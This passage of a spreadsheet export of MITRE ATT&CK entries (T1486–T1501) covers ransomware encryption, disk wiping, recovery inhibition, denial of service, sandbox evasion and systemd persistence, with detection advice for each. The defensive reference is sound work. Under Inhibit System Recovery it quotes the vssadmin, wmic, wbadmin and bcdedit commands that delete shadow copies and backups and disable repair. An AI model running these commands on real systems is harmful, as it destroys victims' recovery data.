To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>impact</t>
  </si>
  <si>
    <t>T1486</t>
  </si>
  <si>
    <t>Data Encrypted for Impact</t>
  </si>
  <si>
    <t>Kernel drivers,File monitoring,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of of binaries involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit. Monitor for the creation of suspicious files as well as unusual file modification activity. In particular, look for large quantities of file modifications in user directories.
In some cases, monitoring for unusual kernel driver installation activity can aid in detection.</t>
  </si>
  <si>
    <t>Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017)
To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)</t>
  </si>
  <si>
    <t>T1487</t>
  </si>
  <si>
    <t>Disk Structure Wipe</t>
  </si>
  <si>
    <t>Kernel drivers,MBR</t>
  </si>
  <si>
    <t>Look for attempts to read/write to sensitive locations like the master boot record and the disk partition table. Monitor for unusual kernel driver installation activity.</t>
  </si>
  <si>
    <t>Adversaries may corrupt or wipe the disk data structures on hard drive necessary to boot systems; targeting specific critical systems as well as a large number of systems in a network to interrupt availability to system and network resources. 
Adversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1487) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1488) if all sectors of a disk are wiped.
To maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>T1488</t>
  </si>
  <si>
    <t>Disk Content Wipe</t>
  </si>
  <si>
    <t>Kernel drivers,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Look for attempts to read/write to sensitive locations like the partition boot sector or BIOS parameter block/superblock. Monitor for unusual kernel driver installation activity.</t>
  </si>
  <si>
    <t>Adversaries may erase the contents of storage devices on specific systems as well as large numbers of systems in a network to interrupt availability to system and network resources.
Adversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk erased instead of individual files.
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>T1489</t>
  </si>
  <si>
    <t>Service Stop</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,Windows Registry,API monitoring</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
Monitor Registry edits for modifications to services and startup programs that correspond to services of high importance. Look for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Service information is stored in the Registry at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;.
Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, &lt;code&gt;ChangeServiceConfigW&lt;/code&gt; may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) 
Adversaries may accomplish this by disabling individual services of high importance to an organization, such as &lt;code&gt;MSExchangeIS&lt;/code&gt;, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>T1490</t>
  </si>
  <si>
    <t>Inhibit System Recovery</t>
  </si>
  <si>
    <t>Windows Registry,Services,Windows event logs,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, and bcdedit. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity.
Monitor the status of services involved in system recovery. Monitor the registry for changes associated with system recovery features (ex: the creation of &lt;code&gt;HKEY_CURRENT_USER\Software\Policies\Microsoft\PreviousVersions\DisableLocalPage&lt;/code&gt;).</t>
  </si>
  <si>
    <t>Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017)
A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:
* &lt;code&gt;vssadmin.exe&lt;/code&gt; can be used to delete all volume shadow copies on a system - &lt;code&gt;vssadmin.exe delete shadows /all /quiet&lt;/code&gt;
* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - &lt;code&gt;wmic shadowcopy delete&lt;/code&gt;
* &lt;code&gt;wbadmin.exe&lt;/code&gt; can be used to delete the Windows Backup Catalog - &lt;code&gt;wbadmin.exe delete catalog -quiet&lt;/code&gt;
* &lt;code&gt;bcdedit.exe&lt;/code&gt; can be used to disable automatic Windows recovery features by modifying boot configuration data - &lt;code&gt;bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures &amp; bcdedit /set {default} recoveryenabled no&lt;/code&gt;</t>
  </si>
  <si>
    <t>T1491</t>
  </si>
  <si>
    <t>Defacement</t>
  </si>
  <si>
    <t>Packet capture,Web application firewall logs,Web logs,Packet capture</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor internal and external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.
</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may modify visual content available internally or externally to an enterprise network. Reasons for Defacement include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. 
### Internal
An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages. While internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)
### External 
Websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) Defacement may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement)
</t>
  </si>
  <si>
    <t>T1492</t>
  </si>
  <si>
    <t>Stored Data Manipulation</t>
  </si>
  <si>
    <t>Application logs,File monitoring</t>
  </si>
  <si>
    <t>Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values.</t>
  </si>
  <si>
    <t>Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making. 
Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data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</si>
  <si>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T1493</t>
  </si>
  <si>
    <t>Transmitted Data Manipulation</t>
  </si>
  <si>
    <t>Packet capture,Network protocol analysis</t>
  </si>
  <si>
    <t>Detecting the manipulation of data as at passes over a network can be difficult without the appropriate tools. In some cases integrity verification checks, such as file hashing, may be used on critical files as they transit a network. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data.</t>
  </si>
  <si>
    <t>Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making. 
Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism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</si>
  <si>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T1494</t>
  </si>
  <si>
    <t>Runtime Data Manipulation</t>
  </si>
  <si>
    <t>Inspect important application binary file hashes, locations, and modifications for suspicious/unexpected values.</t>
  </si>
  <si>
    <t>Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making. 
Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1042) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect.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</si>
  <si>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T1495</t>
  </si>
  <si>
    <t>Firmware Corruption</t>
  </si>
  <si>
    <t>BIOS,Component firmware</t>
  </si>
  <si>
    <t>System firmware manipulation may be detected.(Citation: MITRE Trustworthy Firmware Measurement) Log attempts to read/write to BIOS and compare against known patching behavior.</t>
  </si>
  <si>
    <t>Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices could include the motherboard, hard drive, or video cards.</t>
  </si>
  <si>
    <t>T1496</t>
  </si>
  <si>
    <t>Resource Hijacking</t>
  </si>
  <si>
    <t>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Process use of network,Process monitoring,Network protocol analysis,Network device logs</t>
  </si>
  <si>
    <t>Consider monitoring process resource usage to determine anomalous activity associated with malicious hijacking of computer resources such as CPU, memory, and graphics processing resources. Monitor for suspicious use of network resources associated with cryptocurrency mining software. Monitor for common cryptomining software process names and files on local systems that may indicate compromise and resource usage.</t>
  </si>
  <si>
    <t>Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems which may impact system and/or hosted service availability. 
One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based(Citation: CloudSploit - Unused AWS Regions) systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.</t>
  </si>
  <si>
    <t>T1497</t>
  </si>
  <si>
    <t>Virtualization/Sandbox Evasion</t>
  </si>
  <si>
    <t xml:space="preserve">Virtualization, sandbox, and related discovery techniques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virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.
</t>
  </si>
  <si>
    <t>Adversaries may check for the presence of a virtual machine environment (VME) or sandbox to avoid potential detection of tools and activities. If the adversary detects a VME, they may alter their malware to conceal the core functions of the implant or disengage from the victim. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information from learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Adversaries may use several methods including [Security Software Discovery](https://attack.mitre.org/techniques/T1063) to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) by searching for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) to help determine if it is an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandboxes. (Citation: Unit 42 Pirpi July 2015)
###Virtual Machine Environment Artifacts Discovery###
Adversaries may use utilities such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1086), [Systeminfo](https://attack.mitre.org/software/S0096), and the [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, and/or the Registry. Adversaries may use [Scripting](https://attack.mitre.org/techniques/T1064) to combine these checks into one script and then have the program exit if it determines the system to be a virtual environment. Also, in applications like VMWare, adversaries can use a special I/O port to send commands and receive output. Adversaries may also check the drive size. For example, this can be done using the Win32 DeviceIOControl function. 
Example VME Artifacts in the Registry(Citation: McAfee Virtual Jan 2017)
* &lt;code&gt;HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions&lt;/code&gt;
* &lt;code&gt;HKLM\HARDWARE\Description\System\”SystemBiosVersion”;”VMWARE”&lt;/code&gt;
* &lt;code&gt;HKLM\HARDWARE\ACPI\DSDT\BOX_&lt;/code&gt;
Example VME files and DLLs on the system(Citation: McAfee Virtual Jan 2017)
* &lt;code&gt;WINDOWS\system32\drivers\vmmouse.sys&lt;/code&gt; 
* &lt;code&gt;WINDOWS\system32\vboxhook.dll&lt;/code&gt;
* &lt;code&gt;Windows\system32\vboxdisp.dll&lt;/code&gt;
Common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017)
###User Activity Discovery###
Adversaries may search for user activity on the host (e.g., browser history, cache, bookmarks, number of files in the home directories, etc.) for reassurance of an authentic environment. They might detect this type of information via user interaction and digital signatures. They may have malware check the speed and frequency of mouse clicks to determine if it’s a sandboxed environment.(Citation: Sans Virtual Jan 2016) Other methods may rely on specific user interaction with the system before the malicious code is activated. Examples include waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) and waiting for a user to double click on an embedded image to activate (Citation: FireEye FIN7 April 2017).
###Virtual Hardware Fingerprinting Discovery###
Adversaries may check the fan and temperature of the system to gather evidence that can be indicative a virtual environment. An adversary may perform a CPU check using a WMI query &lt;code&gt;$q = “Select * from Win32_Fan” Get-WmiObject -Query $q&lt;/code&gt;. If the results of the WMI query return more than zero elements, this might tell them that the machine is a physical one. (Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>defense-evasion,discovery</t>
  </si>
  <si>
    <t>T1498</t>
  </si>
  <si>
    <t>Network Denial of Service</t>
  </si>
  <si>
    <t>Sensor health and status,Network protocol analysis,Netflow/Enclave netflow,Network intrusion detection system,Network device logs</t>
  </si>
  <si>
    <t>Detection of Network DoS can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an Network DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.</t>
  </si>
  <si>
    <t>Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
A Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS). Many different methods to accomplish such network saturation have been observed, but most fall into two main categories: Direct Network Floods and Reflection Amplification.
To perform Network DoS attacks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Botnets are commonly used to conduct DDoS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DDoS, so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)
For DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499).
###Direct Network Flood###
Direct Network Floods are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for Direct Network Floods. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
###Reflection Amplification###
Adversaries may amplify the volume of their attack traffic by using Reflection. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflector may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017)
Reflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and NTP(Citation: Cloudflare NTPamplifciationDoS), though the use of several others in the wild have been documented.(Citation: Arbor AnnualDoSreport Jan 2018)  In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb 2018)</t>
  </si>
  <si>
    <t>T1499</t>
  </si>
  <si>
    <t>Endpoint Denial of Service</t>
  </si>
  <si>
    <t>SSL/TLS inspection,Web logs,Web application firewall logs,Network intrusion detection system,Network protocol analysis,Network device logs,Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
Externally monitor the availability of services that may be targeted by an Endpoint DoS.</t>
  </si>
  <si>
    <t>Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
An Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).
To perform DoS attacks against endpoint resources,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Botnets are commonly used to conduct DDoS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DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)
In cases where traffic manipulation is used, there may be points in the the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.(Citation: ArsTechnica Great Firewall of China)
For attacks attempting to saturate the providing network, see the Network Denial of Service Technique [Network Denial of Service](https://attack.mitre.org/techniques/T1498).
### OS Exhaustion Flood
Since operating systems (OSs) are responsible for managing the finite resources on a system, they can be a target for DoS. These attacks do not need to exhaust the actual resources on a system since they can simply exhaust the limits that an OS self-imposes to prevent the entire system from being overwhelmed by excessive demands on its capacity. Different ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018)
#### SYN Flood
With SYN floods excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood)
#### ACK Flood
ACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.(Citation: Corero SYN-ACKflood)
### Service Exhaustion Flood
Different network services provided by systems are targeted in different ways to conduct a DoS. Adversaries often target DNS and web servers, but other services have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
#### Simple HTTP Flood
A large number of HTTP requests can be issued to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare HTTPflood)
#### SSL Renegotiation Attack
SSL Renegotiation Attacks take advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012)
### Application Exhaustion Flood
Web applications that sit on top of web server stacks can be targeted for DoS. Specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust resources and deny access to the application or the server itself.(Citation: Arbor AnnualDoSreport Jan 2018)
### Application or System Exploitation
Software vulnerabilities exist that when exploited can cause an application or system to crash and deny availability to users.(Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent DoS condition.</t>
  </si>
  <si>
    <t>T1500</t>
  </si>
  <si>
    <t>Compile After Delivery</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,File monitoring</t>
  </si>
  <si>
    <t>Monitor the execution file paths and command-line arguments for common compilers, such as csc.exe and GCC/MinGW, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior. The compilation of payloads may also generate file creation and/or file write events. Look for non-native binary formats and cross-platform compiler and execution frameworks like Mono and determine if they have a legitimate purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these should only be used in specific and limited cases, like for software development.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
</t>
  </si>
  <si>
    <t>Static File Analysis,Binary Analysis,Anti-virus,Host intrusion prevention systems,Signature-based detection</t>
  </si>
  <si>
    <t>T1501</t>
  </si>
  <si>
    <t>Systemd Service</t>
  </si>
  <si>
    <t>Linux</t>
  </si>
  <si>
    <t>Systemd service unit files may be detected by auditing file creation and modification events within the &lt;code&gt;/etc/systemd/system&lt;/code&gt;, &lt;code&gt;/usr/lib/systemd/system/&lt;/code&gt;, and &lt;code&gt;/home/&lt;username&gt;/.config/systemd/user/&lt;/code&gt; directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.
Suspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: &lt;code&gt;systemctl list-units -–type=service –all&lt;/code&gt;. Analyze the contents of &lt;code&gt;.service&lt;/code&gt; files present on the file system and ensure that they refer to legitimate, expected executables.
Auditing the execution and command-line arguments of the 'systemctl' utility, as well related utilities such as &lt;code&gt;/usr/sbin/service&lt;/code&gt; may reveal malicious systemd service execution.</t>
  </si>
  <si>
    <t>Systemd services can be used to establish persistence on a Linux system. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.
Systemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the &lt;code&gt;/etc/systemd/system&lt;/code&gt; and &lt;code&gt;/usr/lib/systemd/system&lt;/code&gt; directories and have the file extension &lt;code&gt;.service&lt;/code&gt;. Each service unit file may contain numerous directives that can execute system commands. 
* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start. 
* ExecReload directive covers when a service restarts. 
* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.
Adversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at recurring intervals, such as at system boot.(Citation: Anomali Rocke March 2019)(Citation: gist Arch package compromise 10JUL2018)(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018)
